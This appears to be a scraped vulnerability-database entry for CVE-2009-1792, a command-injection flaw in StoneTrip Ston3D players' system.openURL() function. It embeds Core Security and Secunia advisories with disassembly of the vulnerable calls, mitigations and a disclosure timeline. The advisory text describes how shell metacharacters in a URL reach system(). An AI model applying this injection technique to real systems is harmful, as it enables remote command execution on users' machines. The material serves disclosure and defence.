bl _system __text:00053DB0 lwz %r0, 0x90+var_38(%sp) __text:00053DB4 cmpwi cr7, %r0, 0 __text:00053DB8 beq cr7, loc_53E24 __text:00053DBC b loc_53DF8

  • -----------/

  • Report Timeline

. 2009-04-20: Core Security Technologies notifies the StoneTrip team of the vulnerability and announces its initial plan to publish the content on May 18th, 2009. 2009-04-21: The vendor asks Core for a technical description of the vulnerability. 2009-04-23: Technical details sent to StoneTrip team by Core. 2009-04-24: In addition to the technical details, a Proof of Concept was sent to StoneTrip team. 2009-04-28: Core asks the vendor to confirm the reception of the technical report. 2009-04-28: StoneTrip team notifies that the technical report has been received and that a vulnerability report will be sent to Core soon. 2009-05-07: Core requests a status update for this vulnerability and notifies its plan to publish the advisory on May 18th, 2009. No reply received. 2009-05-15: Core requests an answer to the previous mail. No reply received. 2009-05-18: Core Advisories Team does not release the advisory as originally planned. Core re-schedules the advisory publication date to 26th May 2009. 2009-05-20: Core notifies StoneTrip that the advisory publication date was missed and that the last status requests were not replied. Core also notifies the vendor of the final release date (26th May 2009). 2009-05-28: After trying to contact the StoneTrip team several times without success, the advisory CORE-2009-0401 is published as 'User Release'.

  1. References

[1] http://www.stonetrip.com. [2] ShiVa, a platform for 3D real time development with focus in game development http://www.stonetrip.com/shiva/shiva-3d-game-engine.html. [3] http://www.stonetrip.com/ston3d-players/ston3d-standalone.html. [4] http://www.stonetrip.com/ston3d-players/ston3d-webplayer.html. [5] http://stdn.stonetrip.com.

  1. About CoreLabs

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs.

  1. About Core Security Technologies

Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.

  1. Disclaimer

The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

  1. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFKHuAiyNibggitWa0RAgJTAJsEXfUBmIjxmY7X4hplONY/Z0DOJgCfUKxJ F9s8R8PuYBiIhvLANh3XmhE= =kU8D -----END PGP SIGNATURE----- . ----------------------------------------------------------------------

Do you have VARM strategy implemented?

(Vulnerability Assessment Remediation Management)

If not, then implement it through the most reliable vulnerability intelligence source on the market.

Implement it through Secunia.

For more information visit: http://secunia.com/advisories/business_solutions/

Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com


TITLE: Ston3D "system.openURL()" Command Injection Vulnerability

SECUNIA ADVISORY ID: SA35256

VERIFY ADVISORY: http://secunia.com/advisories/35256/

DESCRIPTION: A vulnerability has been reported in Ston3D, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to an error in the implementation of the "system.openURL()" script function.

The vulnerability is reported in the following products and versions: * Ston3D Web Player version 1.6.0.0 * Ston3D StandAlone Player versions 1.6.2.4 and 1.7.0.1

SOLUTION: Do not browse untrusted websites or follow untrusted links.

Do not open untrusted Ston3D files.

Reportedly an update will be available for Ston3D Web Player later this month.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200905-0330",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "s3dplayer web",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "stonetrip",
        "version": "1.6.0.0"
      },
      {
        "model": "s3dplayer standalone",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "stonetrip",
        "version": "1.6.2.4"
      },
      {
        "model": "s3dplayer standalone",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "stonetrip",
        "version": "1.7.0.1"
      },
      {
        "model": "s3dplayer standalone",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "stonetrip",
        "version": "1.6.2.4 and  1.7.0.1"
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.6,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "s3dplayer web for mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonetrip",
        "version": "x1.6.0.0"
      },
      {
        "model": "s3dplayer standalone for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonetrip",
        "version": "1.7.0.1"
      },
      {
        "model": "s3dplayer standalone for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonetrip",
        "version": "1.6.2.4"
      },
      {
        "model": "s3dplayer standalone for mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonetrip",
        "version": "x1.6.2.4"
      },
      {
        "model": "s3dplayer standalone for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonetrip",
        "version": "1.6.2.4"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "35105"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-006041"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1792"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200905-326"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:stonetrip:s3dplayer_web:1.6.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:stonetrip:s3dplayer_standalone:1.6.2.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:stonetrip:s3dplayer_standalone:1.7.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:stonetrip:s3dplayer_standalone:1.6.2.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:stonetrip:s3dplayer_web:1.6.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:stonetrip:s3dplayer_standalone:1.6.2.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-1792"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Diego Juarez",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200905-326"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2009-1792",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.6,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 9.3,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2009-1792",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.6,
            "id": "VHN-39238",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2009-1792",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200905-326",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-39238",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-39238"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-006041"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1792"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200905-326"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The system.openURL function in StoneTrip Ston3D StandalonePlayer (aka S3DPlayer StandAlone) 1.6.2.4 and 1.7.0.1 and WebPlayer (aka S3DPlayer Web) 1.6.0.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the first argument (the sURL argument). S3DPlayer Web and Standalone are prone to a remote command-injection vulnerability because they fail to adequately sanitize user-supplied input data. \nAttackers can exploit this issue to execute arbitrary commands within the context of the affected application. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n      Core Security Technologies - CoreLabs Advisory\n           http://www.coresecurity.com/corelabs/\n\n       StoneTrip S3DPlayers remote command injection\n\n\n1. *Advisory Information*\n\nTitle: StoneTrip S3DPlayers remote command injection\nAdvisory ID: CORE-2009-0401\nAdvisory URL: http://www.coresecurity.com/content/StoneTrip-S3DPlayers\nDate published: 2009-05-28\nDate of last update: 2009-05-28\nVendors contacted: StoneTrip\nRelease mode: User release\n\n\n2. *Vulnerability Information*\n\nClass: Command injection, Client side\nRemotely Exploitable: Yes\nLocally Exploitable: No\nBugtraq ID: 35105\nCVE Name: CVE-2009-1792\n\n\n3. *Vulnerability Description*\n\nSton3D is a cross-platform technology developed by StoneTrip [1],\nallowing applications developed with ShiVa product [2] to be run from\nvarious media. It is a platform for 3D real time development, specially\ndesigned to make games and other real time applications. \n\nSton3D players come in two flavors:\n\n   1. Ston3D StandalonePlayer [3],\n   2. and Ston3D WebPlayer [4], which runs like an extension or plug-in\nwithin most popular web browsers. \n\nThese players are vulnerable to a command injection vulnerability, which\ncan be exploited by malicious remote attackers. The vulnerability is due\nto the Ston3D scripting language. It provides the function\n\u0027system.openURL()\u0027 which does not properly sanitize the input before\nusing it. \n\n\n4. *Vulnerable packages*\n\n4.1. *Win32*\n\n   . S3DPlayer Web v1.6.0.0\n   . S3DPlayer StandAlone v1.6.2.4\n   . S3DPlayer StandAlone v1.7.0.1\n\n4.2. *MacOS*\n\n   . S3DPlayer Web v1.6.0.0\n   . S3DPlayer StandAlone v1.6.2.4\n\n4.3. *Linux*\n\n   . S3DPlayer StandAlone v1.6.2.4\n\nNOTE: Older versions are probably affected too, but they were not checked. \n\n\n5. *Non-vulnerable packages*\n\nBy the time this advisory was published, the vendor:\n\n   1. had not released patched versions of its products,\n   2. had not answered the requests made by Core Security for 3 weeks\n(see Section 9). \n\nPlease contact StoneTrip for a fix. \n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nThe vendor did not provide this information. A possible mitigation\naction would be to enable MIME type filtering in your IDS/proxies and\nblock S3DPlayer traffic:\n\n/-----------\n\napplication/x-ston3d-stk\n- -----------/\n\nAs a workaround, vulnerable users can also avoid this flaw by disabling\nthe Ston3D Plugin in their web browsers:\n\n\n6.1. *Mozilla Firefox*\n\n   1. Go to the *Tools* menu, and select *Options...*\n   2. Click on the *Main* tab\n   3. Click on the *Manage Add-ons...*\n   4. Disable *Ston3D Plugin*\n\n\n6.2. *Safari*\n\n   1. Go to the *Safari* menu within Safari, and select *Preferences*\n   2. Click on the *Security * tab\n   3. Deselect *Enable plug-ins*\n\n\n6.3. *Internet Explorer*\n\nSet the kill bit for control 7508D2BB-F085-45BF-8261-167C6DF4D477 (as\nexplained in http://support.microsoft.com/kb/240797). \n\nPlease contact StoneTrip for further information, patches and workarounds. \n\n\n7. *Credits*\n\nThis vulnerability was discovered and researched by Diego Juarez from\nCore Security Technologies. \n\n\n8. *Technical Description / Proof of Concept Code*\n\nSton3D is a cross-platform technology allowing applications developed\nwith ShiVa product [2] to be run from various media, such as a website,\nCD/DVD or interactive equipment. This technology provides a scripting\ninterface [5] based on the Lua programming language, within this\ninterface the function \u0027system.openURL\u0027 is defined as follows:\n\n/-----------\n\nPrototype\nsystem.openURL(sURL, sTarget)    --Call this function to open an URL. \n\n- -----------/\n\nIn the current implementation, the call \u0027system.openURL(sURL, sTarget)\u0027\nwith the parameter \u0027sURL\u0027 set as \u0027file://path/command\u0027 will ultimately\nexecute the equivalent of calling\n\n/-----------\nsystem(\"open path/command\");\n- -----------/\n\n By using platform specific delimiter characters this could allow\narbitrary code execution in the context of the player. \n\nFind below the relevant code snippets from various platforms. \n\n\n8.1. *Windows*\n\n/-----------\n\n.text:1000D64D    test    esi, esi\n.text:1000D64F    mov     eax, esi\n.text:1000D651    jnz     short loc_1000D658\n.text:1000D653\n.text:1000D653 loc_1000D653:                ; CODE XREF:\nPandora::ClientCore::HTTPConnectionManager::OpenURL(Pandora::EngineCore::String\nconst \u0026amp;,Pandora::EngineCore::String const \u0026amp;)+1CB\n.text:1000D653    mov     eax, offset Name\n.text:1000D658\n.text:1000D658 loc_1000D658:                ; CODE XREF:\nPandora::ClientCore::HTTPConnectionManager::OpenURL(Pandora::EngineCore::String\nconst \u0026amp;,Pandora::EngineCore::String const \u0026amp;)+1D1\n.text:1000D658    push    1\n.text:1000D65A    push    offset Name       ; lpDirectory\n.text:1000D65F    push    ecx               ; lpParameters\n.text:1000D660    push    eax               ; lpFile\n.text:1000D661    push    offset Operation  ; \"open\"\n.text:1000D666    push    0                 ; hwnd\n.text:1000D668    call    ds:ShellExecuteA\n.text:1000D66E\n.text:1000D66E loc_1000D66E:                ; CODE XREF:\nPandora::ClientCore::HTTPConnectionManager::OpenURL(Pandora::EngineCore::String\nconst \u0026amp;,Pandora::EngineCore::String const \u0026amp;)+1B0\n.text:1000D66E    test    edi, edi\n.text:1000D670    jbe     short loc_1000D67F\n.text:1000D672    test    esi, esi\n.text:1000D674    jz      short loc_1000D67F\n.text:1000D676    add     esi, 0FFFFFFFCh\n.text:1000D679    push    esi               ; Memory\n.text:1000D67A    call    ebp               ; __imp_free\n\n- -----------/\n\n\n8.2. *Linux*\n\n/-----------\n\n.text:08371334    mov     [esp+5Ch+var_58], offset aOpen ; \"open \"\n.text:0837133C    lea     eax, [esp+5Ch+var_34]\n.text:08371340    mov     [esp+5Ch+command], eax\n.text:08371343    call    sub_8109FC0\n.text:08371348    lea     eax, [esp+5Ch+var_1C]\n.text:0837134C    mov     [esp+5Ch+var_58], eax\n.text:08371350    lea     eax, [esp+5Ch+var_34]\n.text:08371354    mov     [esp+5Ch+command], eax\n.text:08371357    call    sub_8108F10\n.text:0837135C    lea     eax, [esp+5Ch+var_34]\n.text:08371360    mov     [esp+5Ch+command], eax\n.text:08371363    call    sub_80DF660\n.text:08371368    mov     [esp+5Ch+command], eax\n.text:0837136B    call    _system\n.text:08371370    lea     eax, [esp+5Ch+var_34]\n.text:08371374    mov     [esp+5Ch+command], eax\n.text:08371377    call    sub_80D92F0\n.text:0837137C    jmp     short loc_8371398\n\n- -----------/\n\n\n8.3. *MacOSX (x86)*\n\n/-----------\n\n__text:0005995B   lea     eax, (aOpen - 597ECh)[ebx] ; \"open \"\n__text:00059961   lea     esi, [esp+5Ch+var_44]\n__text:00059965   mov     [esp+5Ch+var_58], eax\n__text:00059969   mov     [esp+5Ch+var_5C], esi\n__text:0005996C   call    __ZN7Pandora10EngineCore6StringC1EPKc ;\nPandora::EngineCore::String::String(char  const*)\n__text:00059971   mov     [esp+5Ch+var_58], edi\n__text:00059975   mov     [esp+5Ch+var_5C], esi\n__text:00059978   call    __ZN7Pandora10EngineCore6StringpLERKS1_\n__text:0005997D   mov     edx, [esp+5Ch+var_44]\n__text:00059981   test    edx, edx\n__text:00059983   jz      loc_59A5F\n__text:00059989   mov     eax, [esp+5Ch+var_40]\n__text:0005998D   test    eax, eax\n__text:0005998F   jz      loc_59A5F\n__text:00059995\n__text:00059995 loc_59995:                              ; CODE XREF:\nPandora::ClientCore::HTTPConnectionManager::OpenURL(Pandora::EngineCore::String\n const\u0026amp;,Pandora::EngineCore::String  const\u0026amp;)+295\n__text:00059995   mov     [esp+5Ch+var_5C], eax\n__text:00059998   call    _system\n__text:0005999D   mov     eax, [esp+5Ch+var_44]\n__text:000599A1   test    eax, eax\n__text:000599A3   jnz     loc_59AB2\n__text:000599A9   nop     dword ptr [eax+00000000h]\n\n- -----------/\n\n\n8.4. *MacOSX (PPC)*\n\n/-----------\n\n__text:00053D6C   addi    %r30, %sp, 0x90+var_38\n__text:00053D70   addis   %r4, %r31, 0x3F\n__text:00053D74   addi    %r4, %r4, -0x29DC\n__text:00053D78   mr      %r3, %r30\n__text:00053D7C   bl      __ZN7Pandora10EngineCore6StringC1EPKc #\nPandora::EngineCore::String::String(char  const*)\n__text:00053D80   mr      %r3, %r30\n__text:00053D84   mr      %r4, %r29\n__text:00053D88   bl      __ZN7Pandora10EngineCore6StringpLERKS1_\n__text:00053D8C   lwz     %r0, 0x90+var_38(%sp)\n__text:00053D90   cmpwi   cr7, %r0, 0\n__text:00053D94   beq     cr7, loc_53DA4\n__text:00053D98   lwz     %r3, 0x90+var_34(%sp)\n__text:00053D9C   cmpwi   cr7, %r3, 0\n__text:00053DA0   bc      5, 4*cr7+eq, loc_53DAC\n__text:00053DA4\n__text:00053DA4 loc_53DA4:                              # CODE XREF:\nPandora::ClientCore::HTTPConnectionManager::OpenURL(Pandora::EngineCore::String\n const\u0026amp;,Pandora::EngineCore::String  const\u0026amp;)+394\n__text:00053DA4   addis   %rtoc, %r31, 0x3F\n__text:00053DA8   addi    %r3, %rtoc, -0x5620\n__text:00053DAC\n__text:00053DAC loc_53DAC:                              # CODE XREF:\nPandora::ClientCore::HTTPConnectionManager::OpenURL(Pandora::EngineCore::String\n const\u0026amp;,Pandora::EngineCore::String  const\u0026amp;)+3A0\n__text:00053DAC   bl      _system\n__text:00053DB0   lwz     %r0, 0x90+var_38(%sp)\n__text:00053DB4   cmpwi   cr7, %r0, 0\n__text:00053DB8   beq     cr7, loc_53E24\n__text:00053DBC   b       loc_53DF8\n\n- -----------/\n\n\n9. *Report Timeline*\n\n. 2009-04-20:\nCore Security Technologies notifies the StoneTrip team of\nthe vulnerability and announces its initial plan to publish the content\non May 18th, 2009. 2009-04-21:\nThe vendor asks Core for a technical description of the\nvulnerability. 2009-04-23:\nTechnical details sent to StoneTrip team by Core. 2009-04-24:\nIn addition to the technical details, a Proof of Concept\nwas sent to StoneTrip team. 2009-04-28:\nCore asks the vendor to confirm the reception of the\ntechnical report. 2009-04-28:\nStoneTrip team notifies that the technical report has been\nreceived and that a vulnerability report will be sent to Core soon. 2009-05-07:\nCore requests a status update for this vulnerability and\nnotifies its plan to publish the advisory on May 18th, 2009. No reply\nreceived. 2009-05-15:\nCore requests an answer to the previous mail. No reply\nreceived. 2009-05-18:\nCore Advisories Team does not release the advisory as\noriginally planned. Core re-schedules the advisory publication date to\n26th May 2009. 2009-05-20:\nCore notifies StoneTrip that the advisory publication date\nwas missed and that the last status requests were not replied. Core also\nnotifies the vendor of the final release date (26th May 2009). 2009-05-28:\nAfter trying to contact the StoneTrip team several times\nwithout success, the advisory CORE-2009-0401 is published as \u0027User\nRelease\u0027. \n\n\n10. *References*\n\n[1] http://www.stonetrip.com. \n[2] ShiVa, a platform for 3D real time development with focus in game\ndevelopment\nhttp://www.stonetrip.com/shiva/shiva-3d-game-engine.html. \n[3] http://www.stonetrip.com/ston3d-players/ston3d-standalone.html. \n[4] http://www.stonetrip.com/ston3d-players/ston3d-webplayer.html. \n[5] http://stdn.stonetrip.com. \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company\u0027s flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2009 Core Security\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given. \n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.7 (MingW32)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niD8DBQFKHuAiyNibggitWa0RAgJTAJsEXfUBmIjxmY7X4hplONY/Z0DOJgCfUKxJ\nF9s8R8PuYBiIhvLANh3XmhE=\n=kU8D\n-----END PGP SIGNATURE-----\n. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management)  \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nSton3D \"system.openURL()\" Command Injection Vulnerability\n\nSECUNIA ADVISORY ID:\nSA35256\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/35256/\n\nDESCRIPTION:\nA vulnerability has been reported in Ston3D, which can be exploited\nby malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the implementation of\nthe \"system.openURL()\" script function. \n\nThe vulnerability is reported in the following products and\nversions:\n* Ston3D Web Player version 1.6.0.0\n* Ston3D StandAlone Player versions 1.6.2.4 and 1.7.0.1\n\nSOLUTION:\nDo not browse untrusted websites or follow untrusted links. \n\nDo not open untrusted Ston3D files. \n\nReportedly an update will be available for Ston3D Web Player later\nthis month. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-1792"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-006041"
      },
      {
        "db": "BID",
        "id": "35105"
      },
      {
        "db": "VULHUB",
        "id": "VHN-39238"
      },
      {
        "db": "PACKETSTORM",
        "id": "77923"
      },
      {
        "db": "PACKETSTORM",
        "id": "77968"
      }
    ],
    "trust": 2.16
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
